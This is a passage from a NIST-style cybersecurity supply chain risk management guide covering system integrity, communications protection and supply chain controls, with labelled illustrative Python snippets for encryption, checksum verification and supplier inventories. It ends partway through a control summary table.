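from cryptography.fernet import Fernet

key = Fernet.generate_key()      # in practice, obtained from a key management system
fernet = Fernet(key)

data = b"supplier source code, test data, or other proprietary information"
ciphertext = fernet.encrypt(data)          # encrypts and integrity-protects the payload

assert fernet.decrypt(ciphertext) == data  # tampering would raise InvalidToken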
SC-29 HETEROGENEITY
Supplemental C-SCRM Guidance: Heterogeneity techniques include the use of different operating systems,
virtualization techniques, and multiple sources of supply. Multiple sources of supply can improve
component availability and reduce the impact of a supply chain cybersecurity compromise. In case of a
supply chain cybersecurity compromise, an alternative source of supply will allow the enterprise to more
rapidly switch to an alternative system/component that may not be affected by the compromise.
Additionally, heterogeneous components decrease the attack surface by limiting the impact to the subset of
the infrastructure that is using vulnerable components.
Level(s): 2, 3
SC-30 CONCEALMENT AND MISDIRECTION
Supplemental C-SCRM Guidance: Concealment and misdirection techniques for C-SCRM include the
establishment of random resupply times, the concealment of location, randomly changing the fake location
used, and randomly changing or shifting information storage into alternative servers or storage
mechanisms.
Level(s): 2, 3
Control Enhancement(s):
(1)
CONCEALMENT AND MISDIRECTION | RANDOMNESS
Supplemental C-SCRM Guidance: Supply chain processes are necessarily structured with predictable,
measurable, and repeatable processes for the purpose of efficiency and cost reduction. This opens up
the opportunity for potential breach. In order to protect against compromise, the enterprise should
employ techniques to introduce randomness into enterprise operations and assets in the enterprise’s
systems or networks (e.g., randomly switching among several delivery enterprises or routes, or
changing the time and date of receiving supplier software updates if previously predictably scheduled).
An illustrative sketch of such randomization appears after enhancement (4) below.
Level(s): 2, 3
(2)
CONCEALMENT AND MISDIRECTION | CHANGE PROCESSING AND STORAGE LOCATIONS
Supplemental C-SCRM Guidance: Changes in processing or storage locations can be used to protect
downloads, deliveries, or associated supply chain metadata. The enterprise may leverage such
techniques within their information systems and networks to create uncertainty about the activities
targeted by adversaries. Establishing a few process changes and randomizing their use – whether it is
for receiving, acceptance testing, storage, or other supply chain activities – can aid in reducing the
likelihood of a supply chain event.
Level(s): 2, 3
(3)
CONCEALMENT AND MISDIRECTION | MISLEADING INFORMATION
Supplemental C-SCRM Guidance: The enterprise can convey misleading information as part of
concealment and misdirection efforts to protect the information system being developed and the
enterprise’s systems and networks. Examples of such efforts in security include honeynets or
virtualized environments. Implementations can be leveraged to convey misleading information. These
may be considered advanced techniques that require experienced resources to effectively implement
them. If an enterprise decides to use honeypots, it should be done in concert with legal counsel or
following the enterprise’s policies.
Level(s): 2, 3
(4)
CONCEALMENT AND MISDIRECTION | CONCEALMENT OF SYSTEM COMPONENTS
Supplemental C-SCRM Guidance: The enterprise may employ various concealment and misdirection
techniques to protect information about the information system being developed and the enterprise’s
information systems and networks. For example, the delivery of critical components to a central or
trusted third-party depot can be used to conceal or misdirect any information regarding the
component’s use or the enterprise using the component. Separating components from their associated
information into differing physical and electronic delivery channels and obfuscating the information
through various techniques can be used to conceal information and reduce the opportunity for a
potential loss of confidentiality of the component or its use, condition, or other attributes.
Level(s): 2, 3
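For illustration only, with reference to enhancement (1) above: a minimal Python sketch of introducing randomness into a previously predictable process – here, the window for pulling supplier software updates. The function name and jitter bound are hypothetical.

# Minimal sketch: randomizing an update-pull window with a non-guessable source.
import secrets
from datetime import datetime, timedelta

def next_update_window(base: datetime, max_jitter_hours: int = 72) -> datetime:
    """Return a randomized pull time within max_jitter_hours after the base time."""
    jitter_minutes = secrets.randbelow(max_jitter_hours * 60)
    return base + timedelta(minutes=jitter_minutes)

print(next_update_window(datetime(2025, 1, 6, 2, 0)))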
SC-36 DISTRIBUTED PROCESSING AND STORAGE
Supplemental C-SCRM Guidance: Processing and storage can be distributed both across the enterprise’s
systems and networks and across the SDLC. The enterprise should ensure that these techniques are applied
in both contexts. Development, manufacturing, configuration management, test, maintenance, and
operations can use distributed processing and storage. This control applies to the entity responsible for
processing and storage functions or related infrastructure, to include federal agencies and contractors. As
such, this control applies to the federal agency and applicable supplier information systems and networks.
Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 2, 3
Related Controls: SR-3(3)
SC-37 OUT-OF-BAND CHANNELS
Supplemental C-SCRM Guidance: C-SCRM-specific supplemental guidance is provided in control
enhancement SC-37 (1).
Control Enhancement(s):
(1)
OUT-OF-BAND CHANNELS | ENSURE DELIVERY AND TRANSMISSION
Supplemental C-SCRM Guidance: The enterprise should employ security safeguards to ensure that
only specific individuals or information systems receive the information about the information system
or its development environment and processes. For example, proper credentialing and authorization
documents should be requested and verified prior to the release of critical components, such as custom
chips, custom software, or information during delivery.
Level(s): 2, 3
SC-38 OPERATIONS SECURITY
Supplemental C-SCRM Guidance: The enterprise should ensure that appropriate supply chain threat and
vulnerability information is obtained from and provided to the applicable operational security processes.
Level(s): 2, 3
Related Control(s): SR-7
SC-47 ALTERNATIVE COMMUNICATIONS PATHS
Supplemental C-SCRM Guidance: If necessary and appropriate, suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers should be included in the
alternative communication paths described in this control.
Level(s): 1, 2, 3
FAMILY: SYSTEM AND INFORMATION INTEGRITY
[FIPS 200] specifies the System and Information Integrity minimum security requirement as
follows:
Organizations must: (i) identify, report, and correct information and information system
flaws in a timely manner; (ii) provide protection from malicious code at appropriate
locations within organizational information systems; and (iii) monitor information
system security alerts and advisories and take appropriate actions in response.
System and information integrity for systems and components traversing the supply chain is
critical for managing cybersecurity risks throughout the supply chain. The insertion of malicious
code and counterfeits are two primary examples of cybersecurity risks throughout the supply
chain, both of which can at least partially be addressed by deploying system and information
integrity controls. Enterprises should ensure that adequate system and information integrity
protections are part of C-SCRM.
SI-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: The enterprise should include C-SCRM in system and information
integrity policy and procedures, including ensuring that program-specific requirements for employing
various integrity verification tools and techniques are clearly defined. System and information integrity for
information systems, components, and the underlying information systems and networks is critical for
managing cybersecurity risks throughout the supply chain. The insertion of malicious code and counterfeits
are two primary examples of cybersecurity risks throughout the supply chain, both of which can be at least
partially addressed by deploying system and information integrity controls.
Level(s): 1, 2, 3
Related Controls: SR-1, 9, 10, 11
SI-2
FLAW REMEDIATION
Supplemental C-SCRM Guidance: The output of flaw remediation activities provides useful input into the
ICT/OT SCRM processes described in Section 2 and Appendix C. Enterprises should require their prime
contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Level(s): 2, 3
Control Enhancement(s):
(1)
FLAW REMEDIATION | AUTOMATIC SOFTWARE AND FIRMWARE UPDATES
Supplemental C-SCRM Guidance: The enterprise should specify the various software assets within its
information systems and networks that require automated updates (both indirect and direct). This
specification of assets should be defined from criticality analysis results, which provide information on
critical and non-critical functions and components (see Section 2 and Appendix C). A centralized patch
management process may be employed for evaluating and managing updates prior to deployment.
Those software assets that require direct updates from a supplier should only accept updates that
originate directly from the OEM unless specifically deployed by the acquirer, such as with a
centralized patch management process. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2
SI-3
MALICIOUS CODE PROTECTION
Supplemental C-SCRM Guidance: Because the majority of code operated in federal systems is not
developed by the Federal Government, malicious code threats often originate from the supply chain. This
control applies to the federal agency and contractors with code-related responsibilities (e.g., developing
code, installing patches, performing system upgrades, etc.), as well as applicable contractor information
systems and networks. Enterprises should require their prime contractors to implement this control and
flow down this requirement to relevant sub-tier contractors. Departments and agencies should refer to
Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
Related Controls: SA-11; SI-7(15); SI-3(4), (6), (8), and (10); SR-3(3)
SI-4
SYSTEM MONITORING
Supplemental C-SCRM Guidance: This control includes monitoring vulnerabilities that result from past
supply chain cybersecurity compromises, such as malicious code implanted during software development
and set to activate after deployment. System monitoring is frequently performed by external service
providers. Service-level agreements with these providers should be structured to appropriately reflect this
control. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
Control Enhancement(s):
(1)
SYSTEM MONITORING | INTEGRATED SITUATIONAL AWARENESS
Supplemental C-SCRM Guidance: System monitoring information may be correlated with that of
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers, if appropriate. The results of correlating monitoring information may point to supply
chain cybersecurity vulnerabilities or compromises that require mitigation.
Level(s): 2, 3
(2)
SYSTEM MONITORING | RISK FOR INDIVIDUALS
Supplemental C-SCRM Guidance: Persons identified as being of higher risk may include enterprise
employees, contractors, and other third parties (e.g., volunteers, visitors) who may have the need or
ability to access an enterprise’s system, network, or system environment. The enterprise may
implement enhanced oversight of these higher-risk individuals in accordance with policies, procedures,
and – if relevant – terms of an agreement and in coordination with appropriate officials.
Level(s): 2, 3
SI-5
SECURITY ALERTS, ADVISORIES, AND DIRECTIVES
Supplemental C-SCRM Guidance: The enterprise should evaluate security alerts, advisories, and directives
for cybersecurity supply chain impacts and follow up if needed. US-CERT, FASC, and other authoritative
entities generate security alerts and advisories that are applicable to C-SCRM. Additional laws and
regulations will impact who provides additional advisories and how they are provided. Enterprises should ensure that
their information-sharing protocols and processes include sharing alerts, advisories, and directives with
relevant parties with whom they have an agreement to deliver products or perform services. Enterprises
should provide direction or guidance as to what actions are to be taken in response to sharing such an alert,
advisory, or directive. Enterprises should require their prime contractors to implement this control and flow
down this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 1, 2, 3
SI-7
SOFTWARE, FIRMWARE, AND INFORMATION INTEGRITY
Supplemental C-SCRM Guidance: This control applies to the federal agency and applicable supplier
products, applications, information systems, and networks. The integrity of all applicable systems and
networks should be systematically tested and verified to ensure that it remains as required so that the
systems/components traversing through the supply chain are not impacted by unanticipated changes. The
integrity of systems and components should also be tested and verified. Applicable verification tools
include digital signature or checksum verification; acceptance testing for physical components; confining
software to limited privilege environments, such as sandboxes; code execution in contained environments
prior to use; and ensuring that if only binary or machine-executable code is available, it is obtained directly
from the OEM or a verified supplier or distributor. Mechanisms for this control are discussed in detail in
[NIST SP 800-53, Rev. 5]. When purchasing an ICT/OT product, an enterprise should perform due diligence to
understand what a supplier’s integrity assurance practices are. Enterprises should require their prime
contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Related Controls: SR-3(3)
Control Enhancement(s):
(1)
SOFTWARE, FIRMWARE, AND INFORMATION INTEGRITY | BINARY OR MACHINE EXECUTABLE
CODE
Supplemental C-SCRM Guidance: The enterprise should obtain binary or machine-executable code
directly from the OEM/developer or other verified source.
Level(s): 2, 3
(2)
SOFTWARE, FIRMWARE, AND INFORMATION INTEGRITY | CODE AUTHENTICATION
Supplemental C-SCRM Guidance: The enterprise should ensure that code authentication mechanisms,
such as digital signatures, are implemented to ensure the integrity of software, firmware, and
information.
Level(s): 3
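For illustration only: a minimal Python sketch of checksum verification, one of the integrity mechanisms named in the supplemental guidance above. The expected digest stands in for a value published out of band by the OEM or a verified supplier; digital signature verification (enhancement (2)) would provide stronger, cryptographically bound assurance.

# Minimal sketch: verify a component's SHA-256 digest against a published value.
import hashlib

def verify_sha256(path: str, expected_sha256: str) -> bool:
    """Compare a file's SHA-256 digest with the supplier-published digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest() == expected_sha256.lower()

# Example use: quarantine the component if verification fails.
# if not verify_sha256("firmware.bin", published_digest):
#     quarantine("firmware.bin")   # hypothetical handling routine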
SI-12
INFORMATION MANAGEMENT AND RETENTION
Supplemental C-SCRM Guidance: C-SCRM should be included in information management and retention
requirements, especially when the sensitive and proprietary information of a system integrator, supplier, or
external service provider is concerned.
Level(s): 3
SI-20
TAINTING
Supplemental C-SCRM Guidance: Suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers may have access to the sensitive information of a
federal agency. In this instance, enterprises should require their prime contractors to implement this control
and flow down this requirement to relevant sub-tier contractors.
Level(s): 2, 3
Related Controls: SR-9
FAMILY: SUPPLY CHAIN RISK MANAGEMENT
[FIPS 200] does not specify Supply Chain Risk Management minimum security requirements.
[NIST SP 800-53, Rev. 5] established a new control family: Supply Chain Risk Management.
The supplemental guidance below expands upon the SR controls and provides further
information and context for their application. This is a new family in SP 800-53, Rev. 5, and
guidance already exists in that publication. This document (NIST SP 800-161, Rev. 1) includes
all SR control enhancements from SP 800-53, Rev. 5; the following SR control has been added
beyond those in SP 800-53, Rev. 5: SR-13. Readers should consult
NIST SP 800-53, Rev. 5 SR controls together with the controls in this section.
SR-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: C-SCRM policies are developed at Level 1 for the overall enterprise and
at Level 2 for specific missions and functions. C-SCRM policies can be implemented at Levels 1, 2, and 3,
depending on the level of depth and detail. C-SCRM procedures are developed at Level 2 for specific
missions and functions and at Level 3 for specific systems. Enterprise functions including but not limited to
information security, legal, risk management, and acquisition should review and concur on the
development of C-SCRM policies and procedures or provide guidance to system owners for developing
system-specific C-SCRM procedures.
Level(s): 1, 2, 3
SR-2
SUPPLY CHAIN RISK MANAGEMENT PLAN
Supplemental C-SCRM Guidance: C-SCRM plans describe implementations, requirements, constraints,
and implications at the system level. C-SCRM plans are influenced by the enterprise’s other risk
assessment activities and may inherit and tailor common control baselines defined at Level 1 and Level 2.
C-SCRM plans defined at Level 3 work in collaboration with the enterprise’s C-SCRM Strategy and
Policies (Level 1 and Level 2) and the C-SCRM Implementation Plan (Level 1 and Level 2) to provide a
systematic and holistic approach for cybersecurity supply chain risk management across the enterprise.
C-SCRM plans should be developed as a standalone document and only integrated into existing system
security plans if enterprise constraints require it.
Level(s): 3
Related Controls: PL-2
SR-3
SUPPLY CHAIN CONTROLS AND PROCESSES
Supplemental C-SCRM Guidance: Section 2 and Appendix C of this document provide detailed guidance
on implementing this control. Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028 on Improving the Nation's Cybersecurity.
Level(s): 1, 2, 3
Control Enhancement(s):
(1)
SUPPLY CHAIN CONTROLS AND PROCESSES | DIVERSE SUPPLY BASE
Supplemental C-SCRM Guidance: Enterprises should diversify their supply base, especially for critical
ICT/OT products and services. As a part of this exercise, the enterprise should attempt to identify
single points of failure and risk among primes and lower-level entities in the supply chain. See Section
2, Appendix C, and RA-9 for guidance on conducting criticality analysis.
Level(s): 2, 3
Related Controls: RA-9
(2)
SUPPLY CHAIN CONTROLS AND PROCESSES | SUB-TIER FLOW DOWN
Supplemental C-SCRM Guidance: Enterprises should require their prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors throughout the SDLC. The use
of the acquisition process provides an important vehicle to protect the supply chain. As part of
procurement requirements, enterprises should include the need for suppliers to flow down controls to
subcontractors throughout the SDLC. As part of market research and analysis activities, enterprises
should conduct robust due diligence research on potential suppliers or products, as well as their
upstream dependencies (e.g., fourth- and fifth-party suppliers), which can help enterprises avoid single
points of failure within their supply chains. The results of this research can be helpful in shaping the
sourcing approach and refining requirements. An evaluation of the cybersecurity risks that arise from a
supplier, product, or service should be completed prior to the contract award decision to ensure that the
holistic risk profile is well-understood and serves as a weighted factor in award decisions. During the
period of performance, suppliers should be monitored for conformance to the defined controls and
requirements, as well as changes in risk conditions. See Section 3 for guidance on the Role of C-
SCRM in the Acquisition Process.
Level(s): 2, 3
SR-4
PROVENANCE
Supplemental C-SCRM Guidance: Provenance should be documented for systems, system components, and
associated data throughout the SDLC. Enterprises should consider producing SBOMs for applicable and
appropriate classes of software, including purchased software, open source software, and in-house
software. SBOMs should be produced using only NTIA-supported SBOM formats that can satisfy the
EO 14028 minimum SBOM elements [NTIA SBOM]. Enterprises producing SBOMs should use the [NTIA
SBOM] minimum SBOM elements as framing for the inclusion of primary components. SBOMs should be
digitally signed using a verifiable and trusted key. SBOMs can play a critical role in enabling organizations
to maintain provenance. However, as SBOMs mature, organizations should ensure they do not deprioritize
existing C-SCRM capabilities (e.g., vulnerability management practices, vendor risk assessments) under
the mistaken assumption that SBOM replaces these activities. SBOMs and the improved transparency that
they are meant to provide for organizations are a complementary, not substitutive, capability. Organizations
that are unable to appropriately ingest, analyze, and act on the data that SBOMs provide likely will not
improve their overall C-SCRM posture. Federal agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028 on Improving the Nation's Cybersecurity.
Level(s): 2, 3
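For illustration only: a minimal Python sketch that screens an ingested SBOM component record for the NTIA minimum data elements referenced above. The field names are hypothetical; real SBOMs would arrive in an NTIA-supported format such as SPDX or CycloneDX and be mapped to these elements.

# Minimal sketch: flag SBOM component records missing NTIA minimum elements.
NTIA_MINIMUM_ELEMENTS = {
    "supplier_name", "component_name", "version",
    "other_unique_identifiers", "dependency_relationship",
    "sbom_author", "timestamp",
}

def missing_minimum_elements(component: dict) -> set:
    """Return the NTIA minimum elements absent from a component record."""
    return {field for field in NTIA_MINIMUM_ELEMENTS if not component.get(field)}

record = {"supplier_name": "Acme", "component_name": "libexample", "version": "1.4.2"}
print(missing_minimum_elements(record))   # incomplete record flagged for follow-up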
SR-5
ACQUISITION STRATEGIES, TOOLS, AND METHODS
Supplemental C-SCRM Guidance: Section 3 and SA controls provide additional guidance on acquisition
strategies, tools, and methods. Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028 on Improving the Nation's Cybersecurity.
Level(s): 1, 2, 3
Related Controls: SA Control Family
SR-6
SUPPLIER ASSESSMENTS AND REVIEWS
Supplemental C-SCRM Guidance: In general, an enterprise should consider any information pertinent to
the security, integrity, resilience, quality, trustworthiness, or authenticity of the supplier or their provided
services or products. Enterprises should consider applying this information against a consistent set of core
baseline factors and assessment criteria to facilitate equitable comparison (between suppliers and over
time). Depending on the specific context and purpose for which the assessment is being conducted, the
enterprise may select additional factors. The quality of information (e.g., its relevance, completeness,
accuracy, etc.) relied upon for an assessment is also an important consideration. Reference sources for
assessment information should also be documented. The C-SCRM PMO can help define requirements,
methods, and tools for the enterprise’s supplier assessments. Departments and agencies should refer to
Appendix E for further guidance concerning baseline risk factors and the documentation of assessments
and Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
Level(s): 2, 3
SR-7
SUPPLY CHAIN OPERATIONS SECURITY
Supplemental C-SCRM Guidance: The C-SCRM PMO can help determine OPSEC controls that apply to
specific missions and functions. OPSEC controls are particularly important when there is specific concern
about an adversarial threat from or to the enterprise’s supply chain or an element within the supply chain,
or when the nature of the enterprise’s mission or business operations, its information, and/or its
service/product offerings make it a more attractive target for an adversarial threat.
Level(s): 2, 3
SR-8
NOTIFICATION AGREEMENTS
Supplemental C-SCRM Guidance: At a minimum, enterprises should require their suppliers to establish
notification agreements with entities within their supply chain that have a role or responsibility related to
that critical service or product. Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Related Controls: RA-9
SR-9
TAMPER RESISTANCE AND DETECTION
Supplemental C-SCRM Guidance: Enterprises should apply tamper resistance and detection control to
critical components, at a minimum. Criticality analysis can help determine which components are critical.
See Section 2, Appendix C, and RA-9 for guidance on conducting criticality analysis. The C-SCRM PMO
can help identify critical components, especially those that are used by multiple missions, functions, and
systems within an enterprise. Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Related Controls: RA-9
SR-10 INSPECTION OF SYSTEMS OR COMPONENTS
Supplemental C-SCRM Guidance: Enterprises should inspect critical systems and components, at a
minimum, for assurance that tamper resistance controls are in place and to examine whether there is
evidence of tampering. Products or components should be inspected prior to use and periodically thereafter.
Inspection requirements should also be included in contracts with suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers. Enterprises should require
their prime contractors to implement this control and flow down this requirement to relevant sub-tier
contractors.
Criticality analysis can help determine which systems and components are critical and should therefore be
subjected to inspection. See Section 2, Appendix C, and RA-9 for guidance on conducting criticality
analysis. The C-SCRM PMO can help identify critical systems and components, especially those that are
used by multiple missions, functions, and systems (for components) within an enterprise.
Level(s): 2, 3
Related Controls: RA-9
SR-11 COMPONENT AUTHENTICITY
Supplemental C-SCRM Guidance: The development of anti-counterfeit policies and procedures requires
input from and coordination with acquisition, information technology, IT security, legal, and the C-SCRM
PMO. The policy and procedures should address regulatory compliance requirements, contract
requirements or clauses, and counterfeit reporting processes to enterprises, such as GIDEP and/or other
appropriate enterprises. Where applicable and appropriate, the policy should also address the development
and use of a qualified bidders list (QBL) and/or qualified manufacturers list (QML). This helps prevent
counterfeits through the use of authorized suppliers, wherever possible, and their integration into the
organization’s supply chain [CISA SCRM WG3]. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 1, 2, 3
Control Enhancement(s):
(1)
COMPONENT AUTHENTICITY | ANTI-COUNTERFEIT TRAINING
Supplemental C-SCRM Guidance: The C-SCRM PMO can assist in identifying resources that can
provide anti-counterfeit training and/or may be able to conduct such training for the enterprise. The C-
SCRM PMO can also assist in identifying which personnel should receive the training.
Level(s): 2, 3
(2)
COMPONENT AUTHENTICITY | CONFIGURATION CONTROL FOR COMPONENT SERVICE AND REPAIR
Supplemental C-SCRM Guidance: Information technology, IT security, or the C-SCRM PMO should
be responsible for establishing and implementing configuration control processes for component
service and repair, to include – if applicable – integrating component service and repair into the overall
enterprise configuration control processes. Component authenticity should be addressed in contracts
when procuring component servicing and repair support.
Level(s): 2, 3
(3)
COMPONENT AUTHENTICITY | ANTI-COUNTERFEIT SCANNING
Supplemental C-SCRM Guidance: Enterprises should conduct anti-counterfeit scanning for critical
components, at a minimum. Criticality analysis can help determine which components are critical and
should be subjected to this scanning. See Section 2, Appendix C, and RA-9 for guidance on conducting
criticality analysis. The C-SCRM PMO can help identify critical components, especially those used by
multiple missions, functions, and systems within an enterprise.
Level(s): 2, 3
Related Controls: RA-9
SR-12 COMPONENT DISPOSAL
Supplemental C-SCRM Guidance: IT security – in coordination with the C-SCRM PMO – can help
establish appropriate component disposal policies, procedures, mechanisms, and techniques.
Level(s): 2, 3
SR-13 SUPPLIER INVENTORY (NEW)
Control:
a. Develop, document, and maintain an inventory of suppliers that:
   1. Accurately and minimally reflects the organization’s tier one suppliers that may present a
      cybersecurity risk in the supply chain [Assignment: organization-defined parameters for
      determining tier one supply chain];
   2. Is at the level of granularity deemed necessary for assessing criticality and supply chain risk,
      tracking, and reporting; and
   3. Documents the following information for each tier one supplier (e.g., prime contractor):
      i. Unique identifier for the procurement instrument (i.e., contract, task, or delivery order);
      ii. Description of the supplied products and/or services;
      iii. Program, project, and/or system that uses the supplier’s products and/or services; and
      iv. Assigned criticality level that aligns to the criticality of the program, project, and/or system
          (or component of system).
b. Review and update the supplier inventory [Assignment: enterprise-defined frequency].
Supplemental C-SCRM Guidance: Enterprises rely on numerous suppliers to execute their missions and
functions. Many suppliers provide products and services in support of multiple missions, functions,
programs, projects, and systems. Some suppliers are more critical than others, based on the criticality of
missions, functions, programs, projects, systems that their products and services support, and the
enterprise’s level of dependency on the supplier. Enterprises should use criticality analysis to help
determine which products and services are critical and, in turn, the criticality of suppliers to be documented
in the supplier inventory. See Section 2, Appendix C, and RA-9 for guidance on conducting criticality
analysis.
Level(s): 2, 3
Related Controls: RA-9
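For illustration only: a minimal Python sketch of a record type capturing the data elements that SR-13 requires for each tier one supplier. The names, example values, and criticality scale are hypothetical; an enterprise would adapt them to its own inventory tooling and enterprise-defined review frequency.

# Minimal sketch: one inventory record per tier one supplier (hypothetical fields).
from dataclasses import dataclass, field
from datetime import date

@dataclass
class SupplierInventoryEntry:
    supplier: str
    procurement_instrument_id: str            # contract, task, or delivery order
    products_and_services: str                # description of what is supplied
    consuming_programs: list = field(default_factory=list)   # programs/projects/systems served
    criticality_level: str = "moderate"       # aligned to the consuming program or system
    last_reviewed: date = field(default_factory=date.today)  # per enterprise-defined frequency

entry = SupplierInventoryEntry(
    supplier="Acme Components, Inc.",
    procurement_instrument_id="GS-00X-12345/Order-0007",
    products_and_services="Network switches and maintenance services",
    consuming_programs=["Logistics Modernization Program"],
    criticality_level="high",
)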
APPENDIX B: C-SCRM CONTROL SUMMARY
This appendix lists the C-SCRM controls in this publication and maps them to their
corresponding [NIST SP 800-53, Rev. 5] controls as appropriate. Table B-1 indicates those
controls that are defined in the [NIST SP 800-53, Rev. 5] low baseline and deemed to
be relevant to C-SCRM. Some C-SCRM controls were added to this control set to form the C-
SCRM baseline. Additionally, controls that should flow down from prime contractors to their
relevant sub-tier contractors are listed as Flow Down Controls. Given that C-SCRM is an
enterprise-wide activity that requires the selection and implementation of controls at the
enterprise, mission and business, and operational levels (Levels 1, 2, and 3 of the enterprise
according to [NIST SP 800-39]), Table B-1 indicates the enterprise levels at which the controls
should be implemented. C-SCRM controls and control enhancements not in [NIST SP 800-53,
Rev. 5] are noted with an asterisk next to the control identifier, viz., MA-8 and SR-13.
Table B-1: C-SCRM Control Summary
Columns: Control Identifier | Control (or Control Enhancement) Name | C-SCRM Baseline | Flow Down Control | Levels 1, 2, 3
AC-1
Policy and Procedures
x
x
x
x
x
AC-2
Account Management
x
x
x
x
AC-3
Access Enforcement
x
x
x
x
AC-3(8)
Access Enforcement | Revocation of Access
Authorizations
x
x
AC-3(9)
Access Enforcement | Controlled Release
x
x
AC-4
Information Flow Enforcement
x
x
x
AC-4(6)
Information Flow Enforcement | Metadata
x
x
AC-4(17)
Information Flow Enforcement | Domain
Authentication
x
x
AC-4(19)
Information Flow Enforcement | Validation of
Metadata
x
x
AC-4(21)
Information Flow Enforcement | Physical or Logical
Separation of Information Flows
x
AC-5
Separation of Duties
x
x
x
AC-6(6)
Least Privilege | Privileged Access by Non-
organizational Users
x
x
AC-17
Remote Access
x
x
x
x
AC-17(6)
Remote Access | Protection of Mechanism Information
x
x
AC-18
Wireless Access
x
x
x
x
AC-19
Access Control for Mobile Devices
x
x
x
AC-20
Use of External Systems
x
x
x
x
x
AC-20(1)
Use of External Systems | Limits on Authorized Use
x
x
AC-20(3)
Use of External Systems | Non-organizationally
Owned Systems — Restricted Use
x
x
AC-21
Information Sharing
x
x
AC-22
Publicly Accessible Content
x
x
x
AC-23
Data Mining Protection
x
x
x
AC-24
Access Control Decisions
x
x
x
x
AT-1
Policy and Procedures
x
x
x
AT-2(1)
Literacy Training and Awareness | Practical Exercises
x
AT-2(2)
Literacy Training and Awareness | Insider Threat
x
x
x
AT-2(3)
Literacy Training and Awareness | Social Engineering
and Mining
x
AT-2(4)
Literacy Training and Awareness | Suspicious
Communications and Anomalous System Behavior
x
AT-2(5)
Literacy Training and Awareness | Advanced
Persistent Threat
x
AT-2(6)
Literacy Training and Awareness | Cyber Threat
Environment
x
AT-3
Role-based Training
x
x
x
AT-3(2)
Role-based Training | Physical Security Controls
x
AT-4
Training Records
x
x
AU-1
Policy and Procedures
x
x
x
x
AU-2
Event Logging
x
x
x
x
x
AU-3
Content of Audit Records
x
x
x
x
x
AU-6
Audit Record Review, Analysis, and Reporting
x
x
x
AU-6(9)
Audit Record Review, Analysis, and Reporting |
Correlation with Information from Non-technical
Sources
x
AU-10
Non-repudiation
x
AU-10(1)
Non-repudiation | Association of Identities
x
AU-10(2)
Non-repudiation | Validate Binding of Information
Producer Identity
x
x
AU-10(3)
Non-repudiation | Chain of Custody
x
x
AU-12
Audit Record Generation
x
x
x
x
AU-13
Monitoring for Information Disclosure
x
x
x
AU-14
Session Audit
x
x
x
AU-16
Cross-organizational Audit Logging
x
x
AU-16(2)
Cross-organizational Audit Logging | Sharing of Audit
Information
x
x
x
CA-1
Policy and Procedures
x
x
x
x
CA-2
Control Assessments
x
x
x
CA-2(2)
Control Assessments | Specialized Assessments
x
CA-2(3)
Control Assessments | Leveraging Results from
External Organizations
x
CA-3
Information Exchange
x
x
x
CA-5
Plan of Action and Milestones
x
x
x
CA-6
Authorization
x
x
x
x
CA-7(3)
Continuous Monitoring | Trend Analyses
x
CM-1
Policy and Procedures
x
x
x
x
CM-2
Baseline Configuration
x
x
x
x
CM-2(6)
Baseline Configuration | Development and Test
Environments
x
x
CM-3
Configuration Change Control
x
x
x
CM-3(1)
Configuration Change Control | Automated
Documentation, Notification, and Prohibition of
Changes
x
x
CM-3(2)
Configuration Change Control | Testing, Validation,
and Documentation of Changes
x
x
CM-3(4)
Configuration Change Control | Security and Privacy
Representatives
x
x
CM-3(8)
Configuration Change Control | Prevent or Restrict
Configuration Changes
x
x
CM-4
Impact Analyses
x
x
CM-4(1)
Impact Analyses | Separate Test Environments
x
CM-5
Access Restrictions for Change
x
x
x
CM-5(1)
Access Restrictions for Change | Automated Access
Enforcement and Audit Records
x
CM-5(6)
Access Restrictions for Change | Limit Library
Privileges
x
CM-6
Configuration Settings
x
x
x
x
CM-6(1)
Configuration Settings | Automated Management,
Application, and Verification
x
CM-6(2)
Configuration Settings | Respond to Unauthorized
Changes
x
CM-7
Least Functionality
x
x
x
CM-7(1)
Least Functionality | Periodic Review
x
x
CM-7(4)
Least Functionality | Unauthorized Software
x
x
CM-7(5)
Least Functionality | Authorized Software
x
CM-7(6)
Least Functionality | Confined Environments with
Limited Privileges
x
x
CM-7(7)
Least Functionality | Code Execution in Protected
Environments
x
CM-7(8)
Least Functionality | Binary or Machine Executable
Code
x
x
CM-7(9)
Least Functionality | Prohibiting the Use of
Unauthorized Hardware
x
x
CM-8
System Component Inventory
x
x
x
x
CM-8(1)
System Component Inventory | Updates During
Installation and Removal
x
CM-8(2)
System Component Inventory | Automated
Maintenance
x
CM-8(4)
